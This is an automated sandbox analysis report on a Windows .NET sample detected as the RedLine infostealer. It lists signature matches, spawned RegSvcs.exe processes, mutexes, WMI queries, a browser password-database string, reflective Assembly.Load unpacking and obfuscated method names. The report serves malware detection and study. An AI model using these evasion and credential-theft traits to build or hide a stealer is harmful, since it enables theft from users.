Source: 0.2.Z6ojPnRBp1.exe.3747aa0.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 00000002.00000002.1421293852.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
Source: 00000000.00000002.1244401020.0000000003747000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
Source: Process Memory Space: Z6ojPnRBp1.exe PID: 7556, type: MEMORYSTR	Matched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
Source: Process Memory Space: RegSvcs.exe PID: 7796, type: MEMORYSTR	Matched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23

Source: Z6ojPnRBp1.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: 0.2.Z6ojPnRBp1.exe.38236a8.2.raw.unpack, a3qZBicdsl4HC9FnK7.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 0.2.Z6ojPnRBp1.exe.38236a8.2.raw.unpack, a3qZBicdsl4HC9FnK7.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.Z6ojPnRBp1.exe.7e40000.5.raw.unpack, xXVchrZmyPM0CygwNO.cs	Security API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
Source: 0.2.Z6ojPnRBp1.exe.7e40000.5.raw.unpack, xXVchrZmyPM0CygwNO.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.Z6ojPnRBp1.exe.7e40000.5.raw.unpack, xXVchrZmyPM0CygwNO.cs	Security API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
Source: 0.2.Z6ojPnRBp1.exe.7e40000.5.raw.unpack, a3qZBicdsl4HC9FnK7.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 0.2.Z6ojPnRBp1.exe.7e40000.5.raw.unpack, a3qZBicdsl4HC9FnK7.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.Z6ojPnRBp1.exe.38236a8.2.raw.unpack, xXVchrZmyPM0CygwNO.cs	Security API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
Source: 0.2.Z6ojPnRBp1.exe.38236a8.2.raw.unpack, xXVchrZmyPM0CygwNO.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.Z6ojPnRBp1.exe.38236a8.2.raw.unpack, xXVchrZmyPM0CygwNO.cs	Security API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@4/44@1/2

Source: C:\Users\user\Desktop\Z6ojPnRBp1.exe

File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Z6ojPnRBp1.exe.log

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7808:120:WilError_03
Source: C:\Users\user\Desktop\Z6ojPnRBp1.exe	Mutant created: \Sessions\1\BaseNamedObjects\XuhKzEcDXETrtcDVfktDQd

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

File created: C:\Users\user\AppData\Local\Temp\tmpFBFF.tmp

Jump to behavior

Source: Z6ojPnRBp1.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: Z6ojPnRBp1.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId='1'
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId='1'
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor

Source: C:\Users\user\Desktop\Z6ojPnRBp1.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: tmp33D1.tmp.2.dr, tmp33AF.tmp.2.dr, tmp339E.tmp.2.dr, tmp339D.tmp.2.dr, tmp33C0.tmp.2.dr, tmp33C1.tmp.2.dr

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: Z6ojPnRBp1.exe	Virustotal: Detection: 66%
Source: Z6ojPnRBp1.exe	ReversingLabs: Detection: 68%

Source: unknown	Process created: C:\Users\user\Desktop\Z6ojPnRBp1.exe "C:\Users\user\Desktop\Z6ojPnRBp1.exe"
Source: C:\Users\user\Desktop\Z6ojPnRBp1.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Z6ojPnRBp1.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"	Jump to behavior

Source: C:\Users\user\Desktop\Z6ojPnRBp1.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\Z6ojPnRBp1.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Z6ojPnRBp1.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\Z6ojPnRBp1.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\Z6ojPnRBp1.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\Z6ojPnRBp1.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\Z6ojPnRBp1.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\Z6ojPnRBp1.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\Z6ojPnRBp1.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Z6ojPnRBp1.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Z6ojPnRBp1.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Z6ojPnRBp1.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\Z6ojPnRBp1.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\Z6ojPnRBp1.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\Z6ojPnRBp1.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Users\user\Desktop\Z6ojPnRBp1.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\Desktop\Z6ojPnRBp1.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Z6ojPnRBp1.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\Z6ojPnRBp1.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\Z6ojPnRBp1.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Z6ojPnRBp1.exe	Section loaded: iconcodecservice.dll	Jump to behavior

Source: C:\Users\user\Desktop\Z6ojPnRBp1.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\Desktop\Z6ojPnRBp1.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: Z6ojPnRBp1.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: Z6ojPnRBp1.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source: Z6ojPnRBp1.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: zkuS.pdbSHA256 source: Z6ojPnRBp1.exe
Source:	Binary string: zkuS.pdb source: Z6ojPnRBp1.exe

Data Obfuscation

.NET source code contains potential unpacker

Source: 0.2.Z6ojPnRBp1.exe.38236a8.2.raw.unpack, xXVchrZmyPM0CygwNO.cs	.Net Code: NnkWuurFrf System.Reflection.Assembly.Load(byte[])
Source: 0.2.Z6ojPnRBp1.exe.28ff4f8.0.raw.unpack, .cs	.Net Code: System.Reflection.Assembly.Load(byte[])
Source: 0.2.Z6ojPnRBp1.exe.71a0000.4.raw.unpack, .cs	.Net Code: System.Reflection.Assembly.Load(byte[])
Source: 0.2.Z6ojPnRBp1.exe.7e40000.5.raw.unpack, xXVchrZmyPM0CygwNO.cs	.Net Code: NnkWuurFrf System.Reflection.Assembly.Load(byte[])

Source: C:\Users\user\Desktop\Z6ojPnRBp1.exe	Code function: 0_2_0709E302 push es; ret	0_2_0709E310
Source: C:\Users\user\Desktop\Z6ojPnRBp1.exe	Code function: 0_2_0709B902 push esp; iretd	0_2_0709B909
Source: C:\Users\user\Desktop\Z6ojPnRBp1.exe	Code function: 0_2_0709B948 pushfd ; iretd	0_2_0709B951

Source: Z6ojPnRBp1.exe

Static PE information: section name: .text entropy: 7.723290621411897

Source: 0.2.Z6ojPnRBp1.exe.38236a8.2.raw.unpack, stEhHC5dyNWZdc3Cxs.cs	High entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'pTA7hmFeMd', 'vbm7mm2oEr', 'yLm7zjcK7a', 'tOJFqhV4T9', 'shAFjbcBxc', 'PPVF7opBqr', 'SieFFRHlyd', 'CQ49KhWYNLXfEa1kwfA'
Source: 0.2.Z6ojPnRBp1.exe.38236a8.2.raw.unpack, PYMbfI0nZoWDJ0rkwt.cs	High entropy of concatenated method names: 'YeMliLLd5txhJiXhaGc', 'mSMTQELppobqxEUdFRZ', 'NjVkdEQCgd', 'SbIk8pFEjX', 'nkqkEHmO2x', 'LiRgEwLjJJ0V4vd2ffo', 'ypiKkiLuxEAPxIbiGA9', 'FrTdAYLws7bSrc13gOx'
Source: 0.2.Z6ojPnRBp1.exe.38236a8.2.raw.unpack, a9FEgyXluM8VqLFaup.cs	High entropy of concatenated method names: 'aYTPoFDjAc', 'D5HPmRnMpp', 'o7edqnYcdf', 'SUGdjbQBJe', 'aIcPDv9D58', 'jcZP96GE1w', 'Y5PPxxaJUT', 'IBOP2IJbBy', 'NgtPahpXhs', 'rWjPNvTM1i'
Source: 0.2.Z6ojPnRBp1.exe.38236a8.2.raw.unpack, o42KS6wV3C7QTddpw4.cs	High entropy of concatenated method names: 'fqIPCuhVDr', 'QJXPyXNDbN', 'ToString', 'XVdPnIF86x', 'LgKPp2D6M6', 'XboP5LP7xC', 'UptPTbx1W3', 'zJIPklvjtD', 'A4rPImTFia', 'RpZPZEvtxB'
Source: 0.2.Z6ojPnRBp1.exe.38236a8.2.raw.unpack, a3qZBicdsl4HC9FnK7.cs	High entropy of concatenated method names: 'nrSp2xK7Hg', 'iuCpa2y5br', 'gJ0pN3LneL', 'FnCpwtdrJB', 'qVRpLeMcIN', 'GZvpXs83b8', 'a4DpgOwCLk', 'ILPpo2rJL6', 'k0rphUfiOc', 'xPMpm2WdbY'
Source: 0.2.Z6ojPnRBp1.exe.38236a8.2.raw.unpack, EKJCP9NKYExvLAIMZc.cs	High entropy of concatenated method names: 'ToString', 'MR9BDf1Bae', 'HuIB0S0cgd', 'mwwBQp4Zvq', 'GC9B6s6PTH', 'BOEBUCEdlQ', 'HNYBGxOq4T', 'eUcB4bVK27', 'pLGBV9Astv', 'DV6BYaTBOY'
Source: 0.2.Z6ojPnRBp1.exe.38236a8.2.raw.unpack, xXVchrZmyPM0CygwNO.cs	High entropy of concatenated method names: 'lhGF3u4Wud', 'KRBFnLP7xt', 'ySUFpV0npf', 'nqDF5l0WhQ', 'p0bFTOEpss', 'jJmFkpIxrp', 'CwYFIuT6rJ', 'uJQFZw4HUC', 'y50FHcTX1s', 'yJrFClo2LL'
Source: 0.2.Z6ojPnRBp1.exe.38236a8.2.raw.unpack, XVOw2cmNnPdMucsxCs.cs	High entropy of concatenated method names: 'W24E5uiH84', 'JvCET4KGxU', 'kfuEk897XJ', 'ujAEIHPNmQ', 'zJeE8mmaSg', 'i1oEZchBne', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.Z6ojPnRBp1.exe.38236a8.2.raw.unpack, aOm0AM4lqdKcgbYkJ8.cs	High entropy of concatenated method names: 'xKNInCnuZV', 'INFI5RKpNa', 'RDCIk9SHZB', 'yidkmW5f1H', 'xQukztLrB2', 'lahIqvFhR2', 'FUAIjc4H68', 'ODJI7BfSyR', 'MY6IFOhqgG', 'qbcIWWohP2'
Source: 0.2.Z6ojPnRBp1.exe.38236a8.2.raw.unpack, mnF1vlhVm5eNGQllpB.cs	High entropy of concatenated method names: 'yxq8ewbH1x', 'dQX802nUib', 'weM8QZHM5b', 'c6l86E9lFM', 'lkk8U8n7at', 'H3x8GI2amT', 'AHn84LkMhP', 'rY88VrA06y', 'ooo8Y3ThKe', 'bLE8Mqd95l'
Source: 0.2.Z6ojPnRBp1.exe.38236a8.2.raw.unpack, K1I9NYAXhhtNvo4rgM.cs	High entropy of concatenated method names: 'qfjTKyMKjl', 'P0LTS0ZEFk', 'O5V5QZe9ug', 'V3x56hAqdK', 'Bv75UomZyI', 'fXd5Gn9iwj', 'vPg54vRdAp', 'jlr5VV5nVu', 'stW5YcPG6t', 'ek35MuFVOq'
Source: 0.2.Z6ojPnRBp1.exe.38236a8.2.raw.unpack, MILCvAeFND7tmoBnkM.cs	High entropy of concatenated method names: 'UPTk3nCjlM', 'PNNkpSUfhw', 'CLkkTwcrTC', 'K65kIB1e40', 'EoVkZmmonR', 'LvATLejASg', 'ANaTXJaXfl', 'IegTgWV25g', 'PlgToWqSPj', 'gESThkbHqp'
Source: 0.2.Z6ojPnRBp1.exe.38236a8.2.raw.unpack, cG8jX8x0g7gLKKkLD9.cs	High entropy of concatenated method names: 'r5wfctqBJO', 'Y6Kf1eeruv', 't3yfe9WK7v', 'Vkef0WIxLu', 'bjAf6NDjyU', 'QVafUYDjHK', 'r6Of4p2541', 'h5ffV0TlSH', 'ND1fMwuloe', 'VigfD6iqNX'
Source: 0.2.Z6ojPnRBp1.exe.38236a8.2.raw.unpack, ffCubxY8V455NpEQ75.cs	High entropy of concatenated method names: 'i0bIJusqwW', 'cw2IOwNjAB', 'SIPIuAiXcT', 'sgcIlrpNnQ', 'uavIK5XvmW', 'TFOIRuIsLB', 'gL4ISQ5ifn', 'a1gIcb4Awn', 'KIdI1BDlGY', 'KhJIArvSBZ'
Source: 0.2.Z6ojPnRBp1.exe.38236a8.2.raw.unpack, DR44R3p1EN86D7oDmc.cs	High entropy of concatenated method names: 'Dispose', 'NTEjhhIeQL', 'unj70X6Kk1', 'HyeWBE0QrV', 'QfljmR4o9p', 'X7HjzX5a79', 'ProcessDialogKey', 'VVC7qnF1vl', 'Mm57jeNGQl', 'ApB77hVOw2'
Source: 0.2.Z6ojPnRBp1.exe.38236a8.2.raw.unpack, K2SM6iWTFFKs0jgEKn.cs	High entropy of concatenated method names: 'GBqjI3qZBi', 'qsljZ4HC9F', 'hHyjC2DoeB', 'a2GjytG1I9', 'X4rjigMYIL', 'lvAjBFND7t', 'R1WqP2XFwBMeQoErJd', 'Sbk8KsyvbkL8DD10q6', 'loSjjqh13Z', 'jNqjFJdrlp'
Source: 0.2.Z6ojPnRBp1.exe.38236a8.2.raw.unpack, JTmoFfjqkpCHANZlj00.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'cxpEDWibg1', 'zSCE91eEh9', 'iQ2Ex6LVsC', 'XaQE2FwLbh', 'J1YEaUgv4W', 'UlWENQQI6B', 'P32Ew815OJ'
Source: 0.2.Z6ojPnRBp1.exe.38236a8.2.raw.unpack, lk8MTV2m6kuIvXDsh8.cs	High entropy of concatenated method names: 'zMaiM2MStg', 'dF1i9DF86v', 'kiWi2O9onl', 'BIViaMTZmw', 'mjSi0UuA8Q', 'FTMiQKRLsL', 'mkRi6BIGum', 'ycMiUoC5nx', 'u2miGFw61D', 'q8qi4shEti'
Source: 0.2.Z6ojPnRBp1.exe.38236a8.2.raw.unpack, BVJGMizsdx0LA7OeCA.cs	High entropy of concatenated method names: 'mjaERNej4b', 'r7NEcrFn2u', 'XoFE13bVKb', 'bpVEeZuIIj', 'vX1E0MKjDQ', 'LVdE6CDVUc', 'JWUEUeYua7', 'AdoErS8l2C', 'kd7EJxbUQB', 'UFOEOOZgMo'
Source: 0.2.Z6ojPnRBp1.exe.38236a8.2.raw.unpack, XcdDUqjWq0ZrVOIer3p.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'nUAb8Cdmb8', 'TIfbE69Xgo', 'JZ7btjxkZm', 'VKybbh6Nsy', 'zDZbvFmR2Q', 'Tj1bstF7aB', 'bs5brbW7C4'
Source: 0.2.Z6ojPnRBp1.exe.38236a8.2.raw.unpack, wub1ytjjCdfdLhJix4i.cs	High entropy of concatenated method names: 'xmeEm7sDnX', 'tXGEzRjfoy', 'GTZtqBZRTG', 'QmQtjGjl6Q', 'n40t7IpJtc', 'MLCtFRJMZX', 'am6tWuncdD', 'mGZt3MN59F', 'gq9tn5lKCK', 'w7DtpHStY2'
Source: 0.2.Z6ojPnRBp1.exe.38236a8.2.raw.unpack, c2ESVQ76N0EIECY7EL.cs	High entropy of concatenated method names: 'lDhuRAJf4', 'Rg4ll8XKd', 'QJaR86QEd', 'qYpS1O5qY', 'ieB1PM7kf', 'nF5AuABl4', 'WoG4vpm7jxY2bCrRhL', 'NtaJYUokMDpkL5od0g', 'Q64ddjFij', 'BwRE0Ymuw'
Source: 0.2.Z6ojPnRBp1.exe.38236a8.2.raw.unpack, cJVn7XgI8MTEhIeQLx.cs	High entropy of concatenated method names: 'oVo8iFtoNy', 'Vyb8PK3AmY', 'STg88bEY0i', 'SgM8tvj32L', 'fK18vIcqbN', 'Ci48r6UsjF', 'Dispose', 'P6CdnvINbw', 'Hoodp3QgCu', 'ased5rSKo2'
Source: 0.2.Z6ojPnRBp1.exe.38236a8.2.raw.unpack, xB8evT1Hy2DoeBq2Gt.cs	High entropy of concatenated method names: 'Rwv5lrD25P', 'ix35ROYvYV', 'Atk5cK9HRq', 'kyo514KDBW', 'hkK5io7NXJ', 'UbY5Bs7V4e', 'NPa5PgkdEU', 'C8O5dbbrDx', 'p2U58Exhgp', 'jlK5ErsWsQ'
Source: 0.2.Z6ojPnRBp1.exe.7e40000.5.raw.unpack, stEhHC5dyNWZdc3Cxs.cs	High entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'pTA7hmFeMd', 'vbm7mm2oEr', 'yLm7zjcK7a', 'tOJFqhV4T9', 'shAFjbcBxc', 'PPVF7opBqr', 'SieFFRHlyd', 'CQ49KhWYNLXfEa1kwfA'
Source: 0.2.Z6ojPnRBp1.exe.7e40000.5.raw.unpack, PYMbfI0nZoWDJ0rkwt.cs	High entropy of concatenated method names: 'YeMliLLd5txhJiXhaGc', 'mSMTQELppobqxEUdFRZ', 'NjVkdEQCgd', 'SbIk8pFEjX', 'nkqkEHmO2x', 'LiRgEwLjJJ0V4vd2ffo', 'ypiKkiLuxEAPxIbiGA9', 'FrTdAYLws7bSrc13gOx'
Source: 0.2.Z6ojPnRBp1.exe.7e40000.5.raw.unpack, a9FEgyXluM8VqLFaup.cs	High entropy of concatenated method names: 'aYTPoFDjAc', 'D5HPmRnMpp', 'o7edqnYcdf', 'SUGdjbQBJe', 'aIcPDv9D58', 'jcZP96GE1w', 'Y5PPxxaJUT', 'IBOP2IJbBy', 'NgtPahpXhs', 'rWjPNvTM1i'
Source: 0.2.Z6ojPnRBp1.exe.7e40000.5.raw.unpack, o42KS6wV3C7QTddpw4.cs	High entropy of concatenated method names: 'fqIPCuhVDr', 'QJXPyXNDbN', 'ToString', 'XVdPnIF86x', 'LgKPp2D6M6', 'XboP5LP7xC', 'UptPTbx1W3', 'zJIPklvjtD', 'A4rPImTFia', 'RpZPZEvtxB'
Source: 0.2.Z6ojPnRBp1.exe.7e40000.5.raw.unpack, a3qZBicdsl4HC9FnK7.cs	High entropy of concatenated method names: 'nrSp2xK7Hg', 'iuCpa2y5br', 'gJ0pN3LneL', 'FnCpwtdrJB', 'qVRpLeMcIN', 'GZvpXs83b8', 'a4DpgOwCLk', 'ILPpo2rJL6', 'k0rphUfiOc', 'xPMpm2WdbY'
Source: 0.2.Z6ojPnRBp1.exe.7e40000.5.raw.unpack, EKJCP9NKYExvLAIMZc.cs	High entropy of concatenated method names: 'ToString', 'MR9BDf1Bae', 'HuIB0S0cgd', 'mwwBQp4Zvq', 'GC9B6s6PTH', 'BOEBUCEdlQ', 'HNYBGxOq4T', 'eUcB4bVK27', 'pLGBV9Astv', 'DV6BYaTBOY'
Source: 0.2.Z6ojPnRBp1.exe.7e40000.5.raw.unpack, xXVchrZmyPM0CygwNO.cs	High entropy of concatenated method names: 'lhGF3u4Wud', 'KRBFnLP7xt', 'ySUFpV0npf', 'nqDF5l0WhQ', 'p0bFTOEpss', 'jJmFkpIxrp', 'CwYFIuT6rJ', 'uJQFZw4HUC', 'y50FHcTX1s', 'yJrFClo2LL'
Source: 0.2.Z6ojPnRBp1.exe.7e40000.5.raw.unpack, XVOw2cmNnPdMucsxCs.cs	High entropy of concatenated method names: 'W24E5uiH84', 'JvCET4KGxU', 'kfuEk897XJ', 'ujAEIHPNmQ', 'zJeE8mmaSg', 'i1oEZchBne', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.Z6ojPnRBp1.exe.7e40000.5.raw.unpack, aOm0AM4lqdKcgbYkJ8.cs	High entropy of concatenated method names: 'xKNInCnuZV', 'INFI5RKpNa', 'RDCIk9SHZB', 'yidkmW5f1H', 'xQukztLrB2', 'lahIqvFhR2', 'FUAIjc4H68', 'ODJI7BfSyR', 'MY6IFOhqgG', 'qbcIWWohP2'
Source: 0.2.Z6ojPnRBp1.exe.7e40000.5.raw.unpack, mnF1vlhVm5eNGQllpB.cs	High entropy of concatenated method names: 'yxq8ewbH1x', 'dQX802nUib', 'weM8QZHM5b', 'c6l86E9lFM', 'lkk8U8n7at', 'H3x8GI2amT', 'AHn84LkMhP', 'rY88VrA06y', 'ooo8Y3ThKe', 'bLE8Mqd95l'
Source: 0.2.Z6ojPnRBp1.exe.7e40000.5.raw.unpack, K1I9NYAXhhtNvo4rgM.cs	High entropy of concatenated method names: 'qfjTKyMKjl', 'P0LTS0ZEFk', 'O5V5QZe9ug', 'V3x56hAqdK', 'Bv75UomZyI', 'fXd5Gn9iwj', 'vPg54vRdAp', 'jlr5VV5nVu', 'stW5YcPG6t', 'ek35MuFVOq'
Source: 0.2.Z6ojPnRBp1.exe.7e40000.5.raw.unpack, MILCvAeFND7tmoBnkM.cs	High entropy of concatenated method names: 'UPTk3nCjlM', 'PNNkpSUfhw', 'CLkkTwcrTC', 'K65kIB1e40', 'EoVkZmmonR', 'LvATLejASg', 'ANaTXJaXfl', 'IegTgWV25g', 'PlgToWqSPj', 'gESThkbHqp'
Source: 0.2.Z6ojPnRBp1.exe.7e40000.5.raw.unpack, cG8jX8x0g7gLKKkLD9.cs	High entropy of concatenated method names: 'r5wfctqBJO', 'Y6Kf1eeruv', 't3yfe9WK7v', 'Vkef0WIxLu', 'bjAf6NDjyU', 'QVafUYDjHK', 'r6Of4p2541', 'h5ffV0TlSH', 'ND1fMwuloe', 'VigfD6iqNX'
Source: 0.2.Z6ojPnRBp1.exe.7e40000.5.raw.unpack, ffCubxY8V455NpEQ75.cs	High entropy of concatenated method names: 'i0bIJusqwW', 'cw2IOwNjAB', 'SIPIuAiXcT', 'sgcIlrpNnQ', 'uavIK5XvmW', 'TFOIRuIsLB', 'gL4ISQ5ifn', 'a1gIcb4Awn', 'KIdI1BDlGY', 'KhJIArvSBZ'
Source: 0.2.Z6ojPnRBp1.exe.7e40000.5.raw.unpack, DR44R3p1EN86D7oDmc.cs	High entropy of concatenated method names: 'Dispose', 'NTEjhhIeQL', 'unj70X6Kk1', 'HyeWBE0QrV', 'QfljmR4o9p', 'X7HjzX5a79', 'ProcessDialogKey', 'VVC7qnF1vl', 'Mm57jeNGQl', 'ApB77hVOw2'
Source: 0.2.Z6ojPnRBp1.exe.7e40000.5.raw.unpack, K2SM6iWTFFKs0jgEKn.cs	High entropy of concatenated method names: 'GBqjI3qZBi', 'qsljZ4HC9F', 'hHyjC2DoeB', 'a2GjytG1I9', 'X4rjigMYIL', 'lvAjBFND7t', 'R1WqP2XFwBMeQoErJd', 'Sbk8KsyvbkL8DD10q6', 'loSjjqh13Z', 'jNqjFJdrlp'
Source: 0.2.Z6ojPnRBp1.exe.7e40000.5.raw.unpack, JTmoFfjqkpCHANZlj00.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'cxpEDWibg1', 'zSCE91eEh9', 'iQ2Ex6LVsC', 'XaQE2FwLbh', 'J1YEaUgv4W', 'UlWENQQI6B', 'P32Ew815OJ'
Source: 0.2.Z6ojPnRBp1.exe.7e40000.5.raw.unpack, lk8MTV2m6kuIvXDsh8.cs	High entropy of concatenated method names: 'zMaiM2MStg', 'dF1i9DF86v', 'kiWi2O9onl', 'BIViaMTZmw', 'mjSi0UuA8Q', 'FTMiQKRLsL', 'mkRi6BIGum', 'ycMiUoC5nx', 'u2miGFw61D', 'q8qi4shEti'
Source: 0.2.Z6ojPnRBp1.exe.7e40000.5.raw.unpack, BVJGMizsdx0LA7OeCA.cs	High entropy of concatenated method names: 'mjaERNej4b', 'r7NEcrFn2u', 'XoFE13bVKb', 'bpVEeZuIIj', 'vX1E0MKjDQ', 'LVdE6CDVUc', 'JWUEUeYua7', 'AdoErS8l2C', 'kd7EJxbUQB', 'UFOEOOZgMo'
Source: 0.2.Z6ojPnRBp1.exe.7e40000.5.raw.unpack, XcdDUqjWq0ZrVOIer3p.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'nUAb8Cdmb8', 'TIfbE69Xgo', 'JZ7btjxkZm', 'VKybbh6Nsy', 'zDZbvFmR2Q', 'Tj1bstF7aB', 'bs5brbW7C4'
